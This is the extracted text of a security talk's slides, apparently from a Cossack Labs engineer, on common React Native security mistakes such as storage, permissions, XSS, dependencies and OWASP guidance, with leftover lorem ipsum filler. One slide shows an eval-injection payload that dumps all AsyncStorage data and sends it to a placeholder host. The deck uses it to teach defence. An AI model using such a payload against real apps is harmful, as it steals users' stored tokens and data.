sit voluptatem accusantium doloremque laudantium Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium something.org Julia Potapenko React Native Security Addressing Typical Mistakes Let's shed light on React Native apps’ security and explain some risks and threats developers should address to prevent typical mistakes. @julepka cossacklabs.com
sit voluptatem accusantium doloremque laudantium Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium something.org Julia Potapenko About me 👩💻 Security Software Engineer at Cossack Labs Leader of OWASP Zhytomyr Chapter, Ukraine 🇺🇦 ❤︎ OWASP MASVS/MSTG Project @julepka cossacklabs.com We help companies to protect their sensitive and valuable data.
stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes React Native Security. Addressing Typical Mistakes
You can add permissions in multiple files + React Native: It is common practice to use third-party solutions = 💥🤯💥 I don’t need this permission The app crashes if I delete it
possibility is decreases by design. XSS is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result ) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval- based injection and accessing React Native APIs
It is never easy for regular iOS and Android teams. There are no ready to go React Native solutions: a. implement on your own b. use third-party solutions for each platform and write bridging code
It is never easy for regular iOS and Android teams. There are no ready to go React Native solutions: a. implement on your own b. use third-party solutions for each platform and write bridging code Example: IOSSecuritySuite https://github.com/securing/IOSSecuritySuite Swift ➤ Objective-C ➤ React Native
many dependencies Additional CI work One update triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability? Architectural changes required Tight deadlines
Security Verification Standard https://github.com/OWASP/owasp-masvs Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg OWASP MSTG “Please note that the MSTG focuses primarily on native apps. These are apps built with Java or Kotlin using the Android SDK for Android or built with Swift or Objective-C using the Apple SDKs for iOS. Apps using frameworks such as Nativescript, React- native, Xamarin, Cordova, etc. are not within the main focus of the MSTG. However, some essential controls, such as certificate pinning, have been explained already for some of these platforms.”
Addressing Typical Mistakes 1. Use MASVS requirements. 2. Review JavaScript dependencies’ source code to understand native controls behind it. You need to be able to read all the languages: JavaScript (TypeScript), Objective-C (Swift), Java (Kotlin). 3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities like XSS.